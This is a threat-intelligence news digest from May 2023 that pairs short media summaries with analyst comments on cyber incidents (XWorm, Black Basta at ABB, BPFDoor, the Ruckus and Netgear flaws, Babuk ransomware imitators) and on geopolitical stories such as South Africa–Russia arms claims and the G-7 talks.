Daily Drop (487): Is SA Arming RU, XWorm Malware, Economic sanctions on RU, Critical US Cyber Protections, G-7 Discussions, Bl00dy Ransomware, Germany’s Chip Fab's, EU Alert Infrastructure
05-13-2023
Saturday, May 13, 2023 // (IG): BB // Cloak & Dagger// Coffee for Bob
Is South Africa Supplying Weapons To Russia
Analyst Comments: The claims made by the U.S. ambassador against South Africa could profoundly impact the diplomatic and commercial ties between the two nations. If verified, these claims could adversely affect South Africa's global reputation and its financial relationships with Western countries, notably the U.S., one of its major trading allies. The public disclosure of the allegations and the potential for sanctions or trade restrictions have already begun to erode investor confidence, further straining the South African economy. South Africa's initiation of an investigation into the claims demonstrates its commitment to preserving its relations with the U.S. and the West and its intent to dispel these accusations. However, the U.S.'s failure to provide solid evidence may exacerbate the situation. If no compelling evidence is brought forth, it might strain the relationship between the U.S. and South Africa and bring the authenticity of the claims into question.
FROM THE MEDIA: The U.S. ambassador to South Africa, Reuben Brigety, has accused South Africa of supplying weapons to Russia, heightening fears of potential sanctions from Washington. The allegations revolve around a Russian ship, which is under U.S. sanctions, reportedly collecting weapons from a naval base near Cape Town in December. South Africa has denied these allegations and announced an inquiry led by a retired judge to investigate the issue. The South African foreign minister summoned Brigety to express displeasure over his statements. The U.S. State Department has reiterated cooperation on shared priorities, including health, trade, and energy. The Russian ship "Lady R," linked to a sanctioned company, reportedly left Simon's Town and sailed north to Mozambique and Port Sudan before arriving in the Russian port of Novorossiysk on the Black Sea. There are concerns that countries providing material support to Russia may be denied access to U.S. markets, a possibility that has alarmed investors and negatively impacted South Africa's currency, the rand.
READ THE STORY: Reuters
XWorm Malware Exploits Follina Vulnerability in New Wave of Attacks
Analyst Comments: This ongoing phishing campaign, dubbed MEME#4CHAN, presents a significant threat to targeted sectors, particularly the manufacturing and healthcare industries in Germany. The utilization of an unusual attack chain involving meme-filled PowerShell code and a highly obfuscated XWorm payload indicates a high level of sophistication and adaptability in the threat actors involved. The specific use of the Follina vulnerability (CVE-2022-30190) in Microsoft Word documents is concerning as it allows the bypassing of traditionally reliable defense measures such as the Antimalware Scan Interface and Microsoft Defender. This method presents a significant risk as it shows how threat actors are increasingly capable of circumventing standard security measures.
FROM THE MEDIA: Cybersecurity researchers from Securonix have identified an ongoing phishing campaign, nicknamed MEME#4CHAN, primarily targeting manufacturing and healthcare companies in Germany. The campaign employs an unusual approach that involves meme-filled PowerShell code and a highly obfuscated XWorm payload. The attack begins with phishing emails carrying weaponized Microsoft Word documents that exploit the Follina vulnerability (CVE-2022-30190) to install an obfuscated PowerShell script. This script is then used to bypass the Antimalware Scan Interface, disable Microsoft Defender, establish persistence on the targeted system, and launch the XWorm malware. XWorm is a versatile commodity malware, available for purchase on underground forums, capable of performing a variety of malicious operations, including data theft, DDoS attacks, ransomware attacks, and the ability to spread via USB and drop additional malware.
READ THE STORY: THN
Swiss tech giant ABB confirms ‘IT security incident’
Analyst Comments: The cyberattack on ABB highlights the continued threat posed by ransomware groups and the potential for significant disruptions to critical infrastructure and industrial systems. ABB's collaboration with governments and its extensive customer base make it an attractive target for cybercriminals. The incident underscores the importance of robust cybersecurity measures and the need for organizations to regularly update their defenses to mitigate the risk of such attacks. The involvement of the Black Basta group, previously linked to FIN7, indicates the interconnected nature of cybercriminal operations and the need for coordinated efforts to disrupt their activities. As ABB works to address the incident, it is crucial that they prioritize the protection of sensitive data and ensure minimal impact on their customers and partners.
FROM THE MEDIA: Swiss technology conglomerate ABB has confirmed that it is dealing with an "IT security incident" that has affected some of its officers and systems worldwide. Anonymous sources have reported that the Black Basta ransomware group targeted ABB's Windows Active Directory, impacting hundreds of devices. While ABB has not explicitly confirmed whether ransomware was involved, it has taken measures to contain the incident and address disruptions to its operations. ABB works with governments globally and serves large manufacturers, and it has stated that the majority of its systems are now operational. The Black Basta group has previously targeted organizations such as the American Dental Association and Deutsche Windtechnik.
READ THE STORY: The Record
Why the economic war against Russia has failed
Analyst Comments: The effectiveness of the Western sanctions against Russia is subject to debate. On one hand, they have certainly created challenges for the Russian economy and have been a strong political statement against Russia's actions. On the other hand, as The Spectator article points out, they may have underestimated the resilience of the Russian economy and the potential for non-Western countries to fill the void left by reduced Western trade. This situation underscores the complexity of global economics and the difficulty of achieving comprehensive and effective economic isolation in a globalized world. It highlights the need for a more nuanced understanding of the global influence of the West and potential countermeasures when implementing sanctions. Ultimately, the impact of these sanctions may only be fully understood with the benefit of hindsight.
FROM THE MEDIA: The Western sanctions against Russia were intended to isolate the country economically. However, an article in The Spectator suggests that these measures have not been as effective as anticipated. While there has been a decrease in fossil fuel imports from Russia to the UK and the EU, Russia has significantly increased its exports to countries like China and India, which have shown reluctance to join the West's sanctions. Furthermore, evidence suggests that goods initially exported to countries bordering Russia, such as Kazakhstan and Armenia, maybe end up in Russia itself. The article also criticizes the West's focus on targeting wealthy Russians with sanctions, arguing that these individuals have the means to access Western goods through diverted trade. Consequently, the Russian economy has not collapsed but rather shifted its orientation towards non-Western markets.
READ THE STORY: Modern Diplomacy
A Republican-Led Lawsuit Threatens Critical US Cyber Protections
Analyst Comments: This lawsuit underscores the vulnerability of the Biden Administration's cybersecurity strategy, which has been implemented via regulatory directives rather than explicit congressional authorization. If the lawsuit succeeds, it could set a precedent for other Republican-led states and business groups to challenge regulations designed to guard against cyber threats. The case also highlights the ongoing debate about the role of government in securing privately owned infrastructure and the delicate balance between regulatory oversight and state sovereignty. The outcome could significantly impact the development of cybersecurity regulations and the overall national cybersecurity strategy. The fact that agencies are crafting cybersecurity regulations without explicit congressional authorization leaves them vulnerable to legal challenges. This could slow down the implementation of vital cybersecurity measures and increase the risk of cyberattacks on critical infrastructure.
FROM THE MEDIA: Biden Administration's efforts to improve the cybersecurity of U.S. critical infrastructure have led to a major lawsuit, with potential implications for the federal government's capacity to protect vital facilities and systems. The attorneys general of Arkansas, Iowa, and Missouri have filed a lawsuit against a new Environmental Protection Agency (EPA) requirement for states to evaluate the cybersecurity practices of water systems during regular inspections. The lawsuit could have implications beyond the water sector, as other agencies are watching closely as they formulate regulations for other crucial infrastructure, such as hospitals and emergency broadcast systems.
READ THE STORY: Wired
New Stealthy Variant of Linux Backdoor BPFDoor Emerges from the Shadows
Analyst Comments: The existence and longevity of BPFDoor underscore the sophistication of this malware, highlighting the increasing trend of threat actors developing tools targeting Linux systems due to their prevalence in enterprise and cloud environments. The stealthy nature of BPFDoor, particularly its ability to avoid detection by the majority of security vendors, poses a significant challenge to cybersecurity efforts. Organizations should strengthen their security measures, particularly on Linux systems, and stay updated on the latest threat intelligence to detect and mitigate such sophisticated threats. The growing complexity and stealthiness of such malware also suggest a need for improved detection methods and tools within the cybersecurity community.
FROM THE MEDIA: Deep Instinct, a cybersecurity firm, has discovered an undetected variant of a Linux backdoor malware, BPFDoor. This malware is linked to the Chinese threat actor group Red Menshen, known for targeting telecom providers in Asia and the Middle East since 2021. BPFDoor allows the threat actors persistent remote access to compromised systems, often going undetected for extended periods. This new version has improved its evasion tactics by removing many hard-coded indicators and integrating a static library for encryption and a reverse shell for command-and-control communication.
READ THE STORY: THN
G-7 Discussions Center on Fortifing Banks and Supply Chains as China Levels Charges of Hypocrisy Against the Group
Analyst Comments: The ongoing G-7 talks highlight the escalating geopolitical tensions and economic complexities facing the global community. The war of words between the G-7 and China underscores the deep-seated differences between the two, particularly regarding trade practices and respect for the rules-based international order. The accusations of economic coercion by China and the counterclaims of hypocrisy reflect the strained relations and the potential for economic conflict. The discussions about preventing countries from bypassing sanctions against Russia underline the G-7's commitment to addressing the Ukraine crisis and holding Russia accountable.
FROM THE MEDIA: The Group of Seven (G-7) is currently addressing a multitude of issues, with a focus on tensions with China and Russia, during their meeting in Japan, the only Asian member of the group. While G-7 finance ministers and central bank governors strategize on protecting the international rules-based order and preventing what they term "economic coercion" by China, Beijing accuses the group of hypocrisy. Chinese Foreign Ministry spokesperson, Wang Wenbin, argues that China is a victim of economic coercion and criticizes the U.S. for overstretching the concept of national security and imposing unfair measures against foreign companies. The G-7 leaders are also exploring ways to prevent countries from bypassing sanctions against Russia. The recent bank collapses in the U.S. and Europe and the potential U.S. default on the national debt add to the complexity of the discussions.
READ THE STORY: Spectrum Local News
'Very Noisy:' For the Black Hat NOC, It's All Malicious Traffic All the Time
Analyst Comments: The Black Hat Asia event presented a unique challenge in identifying genuine cybersecurity threats due to the high volume of simulated attacks and threat demonstrations. However, the incident highlights the importance of robust and versatile network monitoring tools capable of sifting through high volumes of potentially malicious traffic to identify real threats. The number of security lapses detected, such as unencrypted data transmissions and VPN leaks, emphasize the need for better data handling and encryption practices, even among cybersecurity vendors.
FROM THE MEDIA: At Black Hat Asia, Neil Wyler and Bart Stump presented an inside look into the event's network operations center (NOC). Due to the nature of the event, most of the network traffic is categorized as a severe cybersecurity threat, making it difficult to discern genuine threats. The NOC uses dashboards for real-time monitoring of network activity and relies on raw packet data to investigate suspicious activity. The event's NOC tracked 1,500 unique devices with 72% of the traffic encrypted. Several incidents were reported, including an individual generating significant malicious activity, VPN issues, and unencrypted data transmissions from vendors.
READ THE STORY: DARKReading
CISA warns of critical Ruckus bug used to infect Wi-Fi access points
Analyst Comments: The active exploitation of the CVE-2023-25717 vulnerability in the Ruckus Wireless Admin panel is a serious issue due to the potential for widespread disruption caused by DDoS attacks. The fact that the AndoryuBot botnet can be rented out to other cybercriminals increases the threat level, as it potentially allows a larger number of malicious actors to carry out damaging attacks. Despite a patch being available, the continued vulnerability of many Wi-Fi access points underscores the importance of timely patch management. Organizations, particularly federal agencies, should heed CISA's warning and ensure they have the necessary patches installed to mitigate this threat.
FROM THE MEDIA: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning about a critical remote code execution (RCE) vulnerability (CVE-2023-25717) in the Ruckus Wireless Admin panel that is being actively exploited by the AndoryuBot DDoS botnet. Although the flaw was patched in February 2023, many Wi-Fi access points remain unpatched and susceptible to infection. The botnet can be rented by cybercriminals looking to launch DDoS attacks, with payment accepted via CashApp or several cryptocurrencies. CISA has given U.S. Federal Civilian Executive Branch Agencies until June 2 to secure their devices against this RCE bug.
READ THE STORY: Bleeping Computer
South Korea alleges spies messaged North Korean handlers via YouTube comments
Analyst Comments: The charges of spying for North Korea by trade union leaders in South Korea raise significant concerns about national security and potential foreign influence. The use of covert communication methods and alleged espionage activities highlight the need for robust counterintelligence measures. The case also exposes political tensions, with the accusations being viewed through a partisan lens. The alleged involvement of union leaders, who hold positions of influence, further emphasizes the importance of maintaining vigilance against potential infiltration and protecting critical institutions. As the case unfolds, it is crucial for the legal process to proceed impartially and for any evidence of wrongdoing to be thoroughly evaluated.
FROM THE MEDIA: Four trade union leaders in South Korea, allegedly affiliated with the Korean Confederation of Trade Unions (KCTU), have been charged with spying for North Korea. The leaders are accused of communicating with their handlers by leaving coded comments on obscure YouTube videos. Prosecutors claim that the accused individuals were instructed to photograph military bases, incite anti-American and anti-Japanese sentiments, and use their union positions for espionage activities. The suspects, who have not been named, face charges under the National Security Act, which carries severe penalties. The case has sparked political controversy, with the ruling conservative administration accused of targeting opposition figures. The charges have been denounced by the center-left Democratic Party of Korea (DPK) as politically motivated.
READ THE STORY: The Record
UK cops score a legal win in EncroChat snooping op
Analyst Comments: The ruling represents a significant legal victory for the NCA, which has been using the obtained EncroChat communications as key evidence in its crackdown on cybercrime. However, the decision to defer the question of illegal interception means that this case isn't fully resolved, and further legal challenges could arise. The case underlines the ongoing tension between law enforcement agencies need to combat cybercrime and the legal and ethical issues surrounding the methods used to gather evidence.
FROM THE MEDIA: The UK's National Crime Agency (NCA) has partially won a legal battle challenging the warrants used to acquire messages from the cybercrime platform EncroChat. The Investigatory Powers Tribunal ruled that the NCA did not fail in its duty of candor when obtaining a targeted equipment interference (TEI) warrant to access private messages on EncroChat devices. These messages were used as evidence leading to nearly 3,000 arrests in the UK. The tribunal deferred the question of whether the NCA illegally intercepted communications during transmission until related criminal proceedings in the Crown Court are concluded.
READ THE STORY: The Register
A ransomware source code leak spawned at least 10 ‘Babuk’ imitators, researchers say
Analyst Comments: The reported increase in the use of leaked Babuk ransomware code to develop new ransomware families highlights the potential risks associated with code leaks. It illustrates how threat actors can leverage such leaks to enhance their capabilities and target a broader range of systems. This underscores the importance of robust cybersecurity measures to protect against evolving ransomware threats. The targeting of VMware ESXi systems by these new ransomware families also underscores the growing trend of cyberattacks targeting critical infrastructure and enterprise systems, which often have a more significant impact.
FROM THE MEDIA: Multiple threat actors have leveraged the leaked Babuk ransomware code, which occurred in September 2021, to create up to nine new ransomware families. These families have the capability of targeting VMware ESXi systems. SentinelOne, a cybersecurity company, has identified an increasing trend of Babuk source code adoption from H2 2022 through H1 2023. The firm stated that the leaked code has allowed actors, who may lack the expertise, to target Linux systems. Three ransomware strains that have emerged since the beginning of the year, Cylance, Rorschach (aka BabLock), and RTM Locker, are based on the leaked Babuk source code. Other ransomware families that have incorporated various Babuk features into their code include LOCK4, DATAF, Mario, Play, and Babuk 2023 (aka XVGV) ransomware. The report also noted that actors associated with Royal ransomware have extended their attack toolkit with an ELF variant that can target Linux and ESXi environments.
READ THE STORY: The Record
Enigmatic Hacking Group Operating in Ukraine
Analyst Comments: Red Stinger provides a clear understanding of their activities and the uncertainties surrounding their motivations. The group's focus on stealthy techniques and operational security, as identified by Malwarebytes and Kaspersky, indicates a deliberate effort to remain covert. Their targets, which include Ukrainian and pro-Russian entities, add complexity to the group's motives due to the polarized nature of the conflict. The use of their own hacking tools and infrastructure, along with the deployment of malware known as "DBoxShell" or "Magic Box," demonstrates their technical capabilities. The analysis of the language used by the group offers some clues about their nationality, although a definitive conclusion cannot be reached. Overall, the assessment provides a comprehensive understanding of the situation, highlighting the key aspects and acknowledging the uncertainties involved.
FROM THE MEDIA: A newly discovered hacking group named "Red Stinger" or "Bad Magic" has been conducting cyberespionage operations targeting Ukrainian and pro-Russian entities. The motivations of the group remain unclear, given the polarized nature of the conflict. Malwarebytes and Kaspersky have identified the group's activities dating back to 2020, suggesting a focus on stealthy techniques and operational security. The victims of Red Stinger include central Ukrainian targets and individuals involved in Moscow's discredited referendums in Ukrainian territories. The group utilizes its own hacking tools and infrastructure, and the malware deployed is called "DBoxShell" or "Magic Box." The nationality of the group remains uncertain, although some clues suggest they may not be native English speakers.
READ THE STORY: BankInfoSec
Netgear Routers' Flaws Expose Users to Malware, Remote Attacks, and Surveillance
Analyst Comments: The discovery of multiple security flaws in Netgear RAX30 routers raises concerns about the vulnerability of these devices and the potential risks they pose to users' privacy and security. The ability to bypass authentication and achieve remote code execution highlights the critical nature of these vulnerabilities. Promptly updating the firmware to the latest version is crucial to mitigate the risks associated with these flaws. Netgear's response in releasing a patch demonstrates its commitment to addressing security concerns and protecting its customers. However, it is essential for users to remain vigilant and ensure their devices are regularly updated to stay protected from emerging threats.
FROM THE MEDIA: Multiple security vulnerabilities have been discovered in Netgear RAX30 routers, which, when chained together, can bypass authentication and lead to remote code execution. The flaws, disclosed at the Pwn2Own hacking competition, enable attackers to monitor internet activity, redirect traffic to malicious websites, inject malware into network traffic, and gain control over networked smart devices. The vulnerabilities include missing authentication information disclosure, stack-based buffer overflow authentication bypass, device configuration cleartext storage information disclosure, and command injection remote code execution. Netgear has released firmware version 1.0.10.94 to address these issues, and users are advised to update their routers to mitigate potential risks.
READ THE STORY: THN
Kingston's SSD firmware has Coldplay lyrics hidden within it
Analyst Comments: The inclusion of Coldplay lyrics in Kingston's firmware is an intriguing and unexpected discovery. It is unclear why the lyrics were embedded in the firmware and whether they serve any functional purpose or were simply added as a prank. This incident highlights the need for thorough firmware analysis and raises concerns about the potential presence of undocumented or unauthorized content in firmware. Kingston's response to this finding and their explanation behind the presence of the lyrics will provide further insight into this peculiar situation.
FROM THE MEDIA: Security researcher Nicholas Starke discovered the lyrics of Coldplay's song "The Scientist" embedded within the firmware of Kingston's SSD controller. The lyrics were found in the firmware version "SKC2000_S2681103," used in Kingston's KC2000 product line of solid-state drives. The presence of song lyrics in the firmware, particularly in a deeply embedded component like a hard disk controller, is highly unusual and raises questions about its purpose.
READ THE STORY: Bleeping Computer
Spanish Police Take Down Massive Cybercrime Ring, 40 Arrested
Analyst Comments: The arrest of the Trinitarian’s gang highlights the continued threat posed by organized cybercrime groups and their evolving tactics. The use of phishing and smishing techniques demonstrates the effectiveness of social engineering in luring victims into revealing sensitive information. This case serves as a reminder of the importance of cybersecurity awareness and the need for individuals to remain vigilant against suspicious messages and links. Additionally, the gang's use of stolen funds to finance illegal activities underscores the interconnected nature of cybercrime and other forms of criminality. Law enforcement's successful operation demonstrates the importance of international cooperation and the commitment to dismantling organized criminal networks.
FROM THE MEDIA: Spanish authorities have arrested 40 individuals linked to an organized crime gang called Trinitarians, including two hackers involved in bank scams through phishing and smishing techniques. The group defrauded over 300,000 victims, resulting in losses exceeding €700,000. The cybercriminals used SMS messages with bogus links, redirecting users to phishing panels disguised as legitimate financial institutions. By stealing victims' credentials, the gang compromised accounts to request loans and link cards to cryptocurrency wallets. The stolen funds were used to support the group's activities, including legal fees, money transfers to imprisoned members, and purchases of narcotics and weapons. The group also utilized a network of mules to receive and withdraw money from bank transfers and engaged in point-of-sale terminal scams. Law enforcement conducted searches, seizing computer equipment, cash, lock-picking tools, and documents revealing the gang's organizational structure.
READ THE STORY: THN
New Phishing-as-a-Service Platform Lets Cybercriminals Generate Convincing Phishing Pages
Analyst Comments: The emergence of the Greatness phishing-as-a-service platform demonstrates the growing sophistication and accessibility of phishing tools for cybercriminals. By providing pre-built decoy login pages and bypassing 2FA protections, this platform lowers the barrier to entry for conducting phishing attacks targeting Microsoft 365 users. The use of convincing login pages tailored to specific organizations increases the likelihood of victims falling for the scam. Organizations need to remain vigilant and implement multi-layered security measures to detect and prevent phishing attacks, including employee education, email filtering, and strong authentication protocols. Microsoft's efforts to enforce number matching in Authenticator push notifications are a positive step toward enhancing 2FA protections, but it is essential for users and organizations to stay informed about evolving phishing techniques and adopt the latest security practices to mitigate the risks.
FROM THE MEDIA: A new phishing-as-a-service (PhaaS) platform called Greatness has been used by cybercriminals to target Microsoft 365 users, making it easier for them to conduct phishing attacks. Greatness provides affiliates with attachment and link builders that create convincing decoy login pages, pre-filled with the victim's email address and displaying their company logo and background image. The campaigns involving Greatness have targeted organizations in the manufacturing, healthcare, and technology sectors, primarily in the US, UK, Australia, South Africa, and Canada. The platform allows attackers to bypass two-factor authentication (2FA) and harvest credentials and time-based one-time passwords (TOTPs) from victims. The phishing kits include an administration panel for the configuration and tracking of stolen information.
READ THE STORY: THN
Malicious Chatbots Target Casinos in Southeast Asia
Analyst Comments: The ChattyGoblin campaign demonstrates the evolving tactics of threat actors targeting the gambling industry in Southeast Asia. By leveraging chatbots to target customer support agents, the attackers aim to gain unauthorized access to gambling operations and potentially carry out further malicious activities. The use of password-protected archives and tools like SharpUnhooker and Cobalt Strike showcases the sophistication of the attackers. It is crucial for gambling operators in the region to enhance their cybersecurity defenses, including employee awareness training, robust access controls, and continuous monitoring of suspicious activities.
FROM THE MEDIA: A campaign called "ChattyGoblin" has been targeting customer support agents in Southeast Asian gambling operations since October 2021. Researchers at ESET have attributed the campaign to threat groups backed by China. The threat actors primarily rely on chat applications like Comm100 and LiveHelp. In one attack on a gambling company in the Philippines, the attackers used a chatbot to distribute a dropper named "agentupdate_plugins.exe" via the LiveHelp100 chat application. The dropper deploys a second executable based on the SharpUnhooker tool, which then downloads the ChattyGoblin attack's second stage from a password-protected ZIP archive. The final payload is a Cobalt Strike beacon that communicates with a command-and-control server.
READ THE STORY: DARKReading
Silk Road scammer charged with narcotics trafficking and money laundering
Analyst Comments: The charges against James Ellingson highlight the continued efforts of law enforcement to hold individuals accountable for their activities on darknet marketplaces. The case serves as a reminder of the illicit activities that occurred on Silk Road and the potential consequences for those involved. It also underscores the use of cryptocurrencies, such as Bitcoin, in facilitating illegal transactions. The DOJ's action demonstrates its commitment to pursuing cybercriminals involved in drug trafficking and other illicit activities.
FROM THE MEDIA: The Department of Justice (DOJ) has brought new charges against James Ellingson, a scammer on the Silk Road marketplace, for allegedly selling drugs and scamming Silk Road's founder. Ellingson, using various account names, sold a range of narcotics in exchange for Bitcoin. He is also accused of defrauding Ross Ulbricht by offering fake assassinations and receiving large payments for them. Ellingson faces charges of narcotics trafficking conspiracy, narcotics importation conspiracy, and money laundering conspiracy. The DOJ's move is seen as a way to tie up loose ends in the Silk Road investigation.
READ THE STORY: The Record
Inside the cybersecurity labs protecting U.S. critical infrastructure
Analyst Comments: The work being done at MITRE's labs is crucial given the escalating threats to critical infrastructure from both state-sponsored and criminal hacking groups. These threats have been growing in sophistication and frequency, making the research and development work in these labs even more important. By exploring the vulnerabilities of outdated physical components within critical infrastructure, and how these vulnerabilities may be exploited as operators integrate modern technologies and cloud-based storage onto these parts, MITRE is tackling an often-overlooked aspect of cybersecurity. Tools such as Caldera for operational technology systems, which allows infrastructure operators to simulate cyberattacks on their own systems, are vital for strengthening defenses and preparing for potential breaches.
FROM THE MEDIA: MITRE Corp, a not-for-profit organization that develops technology and security tools, has opened its research and development labs in Northern Virginia for a press tour, showcasing the important research being conducted to protect the nation’s critical infrastructure from cyberattacks. The tour included the Cyber Infrastructure Protection Innovation Center, the Cyber Innovations Lab, and the Integration, Demonstration, and Experimentation for Aeronautics (IDEA) Lab. These labs are developing tools and conducting simulations to help improve the security of critical infrastructure, such as utilities, hospitals, and transport systems.
READ THE STORY: Axios
With AI hype driving up server GPU prices, will cloud costs rise next
Analyst Comments: The article provides a valuable perspective on the impact of AI development on the data center industry, particularly in terms of the demand and pricing of GPUs. It highlights a significant challenge in the AI sector - the high computational requirements of machine learning and the associated cost implications. As AI models become more complex, the demand for GPUs and similar accelerators is expected to continue growing, potentially exacerbating the supply-demand imbalance. The predicted increase in cloud GPU costs could have significant implications for companies relying on cloud services for their AI workloads. This could potentially create barriers for smaller businesses and start-ups that may struggle with increased operational costs.
FROM THE MEDIA: The article by Timothy Prickett Morgan discusses the skyrocketing demand for machine-learning accelerators, particularly GPUs, which are essential for training, testing, and running AI models. This demand surge is causing GPU prices to increase substantially, with top-end Nvidia models selling for up to $40,000 each. The situation is likened to the used car market in the US, characterized by high demand and insufficient supply. This trend is causing cloud service providers and hyper scalers to ration GPU access among their developers, and cloud GPU cost increases are anticipated. The article also mentions a discussion about the reasons behind the choice of certain locations for data center construction, cooling technologies, constraints for large language models, and the hardware requirements for recommendation systems.
READ THE STORY: The Register
Discord discloses data breach after support agent got hacked
Analyst Comments: This data breach is a significant incident given the popularity of Discord and the potential sensitivity of the exposed information, especially email addresses and support messages. It highlights the risks associated with third-party access and the importance of robust security measures across all users with access to sensitive information. Despite Discord's swift response, the incident may negatively impact user trust in the platform's security measures. The fact that the compromised account belonged to a third-party support agent underlines the importance of ensuring security protocols are enforced not only internally but also among partners and third-party vendors. It's a reminder for all organizations to assess their cybersecurity posture regularly and monitor all users with access to sensitive data.
FROM THE MEDIA: Discord, a popular instant messaging, and social media platform with 150 million monthly active users, suffered a data breach after a third-party support agent's account was compromised. The breach exposed the agent's support ticket queue, which contained user email addresses, messages exchanged with Discord support, and any attachments sent with the tickets. Once the breach was discovered, Discord immediately disabled the compromised account and ran malware checks on the affected machine. Although Discord considers the risk minimal, it has advised affected users to be vigilant for any suspicious activity, such as fraud or phishing attempts.
READ THE STORY: Bleeping Computer
The threat and promise of artificial intelligence
Analyst Comments: The article provides a comprehensive exploration of the potential impacts of AI on our society, both in economic and social terms. It raises important questions about how we can navigate these challenges, particularly the potential displacement of jobs and the existential questions about human identity and society. The comparison to the decline of horses in the UK as a working animals is a powerful analogy that underscores the potential magnitude of the changes AI might bring. The article also highlights the potential benefits of AI, including increased productivity and the creation of new job categories. This balanced view helps to provide a nuanced understanding of the issues at hand. The challenge of regulating AI is accurately depicted in the article. Given AI's wide-ranging applications and impacts, creating effective policies and regulations will require a concerted, multi-disciplinary effort. It's clear that ongoing discussions and research in this area are critical to ensure the responsible and ethical use of AI.
FROM THE MEDIA: The article discusses the potential impact of artificial intelligence (AI) on society, comparing the decline of horses in the UK as working animals to the potential decline of human labor due to AI advancements. It discusses the implications of AI for jobs and productivity, revealing that AI and automation have led to the loss of middle-income jobs while creating new job specialties. The article predicts that up to 18% of jobs could be automated globally in the future, with white-collar workers being particularly vulnerable. Beyond economic effects, AI also raises existential questions about human identity and the structure of society. It could lead to more rational systems but could also promote disinformation, increase monopoly power, enable invasive surveillance, and potentially manipulate democratic processes. The article concludes by stating that regulating AI is challenging due to its vast scope and influence and highlights the urgent need to understand its potential harms.
READ THE STORY: FT
Items of interest
US Debt Ceiling Looms Over Biden’s Foreign Trips
Analyst Comments: The current deadlock over the U.S. debt ceiling poses a significant risk to President Biden's foreign policy agenda. The potential cancellation or alteration of his physical presence at the G-7 and Quad meetings could undermine the perceived strength and reliability of the United States as a global actor, especially at a time when geopolitical competition with China is intensifying. The G-7 summit is particularly significant as it focuses on countering China's economic coercion and supporting Ukraine's defense against Russia. Biden's absence might be interpreted as a lack of commitment or capability in dealing with these major global issues. Furthermore, the symbolism of a U.S. president's presence in Hiroshima, given its historical significance, could be lost.
FROM THE MEDIA: The ongoing deadlock between the White House and congressional Republicans regarding the increase of the US debt ceiling could impact President Biden's upcoming meetings with allies in Japan and Australia. Biden is expected to attend the G-7 summit in Hiroshima, Japan, on May 17, and the Quad Summit in Sydney, Australia, on May 22. These meetings are seen as crucial for deepening cooperation on regional challenges and countering China’s influence. However, Biden stated that resolving the debt ceiling issue is the top priority on his agenda and he might have to attend the summits virtually or not at all, depending on the state of these negotiations. G-7 leaders will focus on countering Beijing’s economic coercion, supporting Ukraine's defense against Russia, and discussing nuclear disarmament and non-proliferation. In Papua New Guinea, Biden will meet with Pacific Island Forum leaders to establish stronger strategic ties and discourage them from making security deals with China. The Quad Summit will aim to bolster economic and security relations among the US, Japan, India, and Australia.
READ THE STORY: VOA
Getting Started in Firmware Analysis & IoT Reverse Engineering (Video)
FROM THE MEDIA: The speaker expresses their desire to learn more about these subjects and mentions the complexity of the technology, engineering, and hardware hacking involved in smart devices. They highlight the importance of security in IoT and the potential vulnerabilities present in outdated and legacy technologies. The speaker then proceeds to demonstrate a practical example of reverse engineering firmware for a TP-Link router using tools like binwalk and explores the extracted file system to identify potential vulnerabilities and default settings. They also mention the option of manually analyzing the binaries using disassemblers or debuggers. Later in the transcript, the speaker introduces a sponsor called Bug Proof, which offers a platform for IoT security research and automated analysis of firmware.
IoT Security Find Vulnerabilities and Backdoor In Firmware (Video)
FROM THE MEDIA: In the video, the presenter discusses IoT security and router analysis. They focus on performing firmware analysis to identify potential network attacks and vulnerabilities in routers. The attacker may plant malicious firmware with a backdoor connection to gain remote access to the routers. The presenter demonstrates the use of tools like binwalk to extract the firmware and explores different directories for sensitive information. They highlight the importance of examining files such as config and init.d for potential network-related vulnerabilities. Specifically, they analyze a file called "firewall" and decode a base64-encoded value to reveal a modified command for creating a reverse shell using Netcat.
These open-source products are reviewed by analysts at InfoDom Securities, providing possible context about current media trends related to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.